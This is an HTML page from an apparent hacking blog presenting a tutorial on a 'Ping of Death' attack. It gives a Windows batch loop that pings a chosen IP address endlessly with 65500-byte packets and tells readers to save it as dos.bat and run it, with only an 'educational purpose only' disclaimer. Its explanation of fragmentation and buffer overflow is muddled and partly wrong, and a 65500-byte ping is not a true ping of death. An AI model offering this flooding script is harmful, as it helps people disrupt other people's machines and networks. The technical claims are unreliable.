<html>
<head>
  <title>Ping of Death Attack (PoD) Tutorial | Hackism.net</title>
  <meta charset="UTF-8">
  <meta name="keywords" content="Hackism, hackism.net, sqli, xss, hackers, hack, ddos, deface, cyber, anon, anonymous, HTML, CSS, XML, XHTML, JavaScript">
  <meta name="author" content="Aayush Agarwal">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="img/fav.ico" type="image/x-icon" />
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">
  <link rel="stylesheet" href="css/tuts.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <link href="https://fonts.googleapis.com/css?family=Josefin+Sans:300i" rel="stylesheet"> 
  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/angularjs/1.0.7/angular.min.js"></script>
</head>

<body>

<nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
 <div class="container" style="padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto;">
  <div class="navbar-header">
    <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </button>    
    <a class="navbar-brand" href="http://hackism.net">Hackism</a>
  </div>
  <div class="navbar-collapse collapse">
    <ul class="nav navbar-nav navbar-right">
      <li><a href="../index.html">Home</a></li>
      <li><a href="index.html">Tutorials</a></li>
    </ul>
  </div>
 </div>
</nav>




<div class="jumbotron">
<div  style="margin-top: 2%;">
 <h1>hacking blog,<br>because we love reading.</h1>
 <hr width="90%">
</div>
</div>

<div class="container">

<div class="col-md-12 text-center" style="background-color: #FF5050; color: #fff; padding: 5px;">
<b>NOTE : this article is for educational purpose only<br>we are not responsible for any acts.</b>
</div>

<!--edit-->

<div class="col-sm-9 col-md-6 col-lg-8" style="background-color:#fff;">
<h2 class="text-center">How To Perform Ping of Death Attack Using CMD And Notepad</h2><hr>

<!--image-->
<img src="img/tuts/ping-of-death.png" class="img-responsive">


<!--required-->
<h4>so what you require?</h4>
<p>
 <ul>
  <li>notepad</li>
  <li>CMD</li>
 </ul>
</p><br>
 
<!--tut starts-->

<h4>how it works :</h4>
 
Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, the ping packet gets fragmented into smaller groups of packets.
One fragment is of 8 octets size. When these packets reach the target computer, they arrive in fragments. So, the target computer reassembles the malformed packets which are received in chunks. But, the whole assembled packet causes buffer overflow at the target computer.
This buffer flow often causes the system crash making the system more vulnerable to attack.
Once the system becomes more vulnerable to attack, it allows more attacks like the injection of a trojan horse on the target machine.

<h4>So lets start :</h4>

open notepad<br>
Copy the following text on the notepad

<pre>
:loop
ping |IP Address| -l 65500 -w 1 -n 1
goto :loop
</pre>

In the above command, replace <IP Address> with an IP address.<br>
Save the the file as dos.bat<br>
now double click on it and you will see a command prompt running with a lot of pings.<br>
<b>This command might not work on some systems.</b>


<hr>

<!--author-->

<div class="author">
  <blockquote>Ping of Death Attack tutorial<small style="text-align:right;">by aayush.</small></blockquote>
</div>



</div> <!--left div end-->


<!--ads-->


<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads1.png" width="100%">
</div>
<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads2.png" width="100%">
</div>
<div class="col-sm-3 col-md-6 col-lg-4" style="background-color:#333;">
<img src="img/ads3.png" width="100%">
</div>


 
</div>

</div> <!--container-fluid end-->


<!--footer-->
<br>
<footer class="container-fluid">
 <center>       
  <div style="font-size: 30px;">
   <a href="https://www.facebook.com"><i class="fa fa-facebook-official" aria-hidden="true"></i></a>
   <a href="https://www.twitter.com"><i class="fa fa-twitter-square" aria-hidden="true"></i></a>
   <a href="https://www.linkedin.com"><i class="fa fa-linkedin-square" aria-hidden="true"></i></a>
  </div>       
  <div class="text-center" style="font-size: 15px;">
   <a href="#">terms & conditions</a>&nbsp;
   <a href="#">privacy policy</a>&nbsp;
   <a href="#">contact us</a>&nbsp;
  </div>
   <p style="margin: 5px;">Hackism Technologies &copy 2016</p>
 </center>
</footer>



</body>
</html>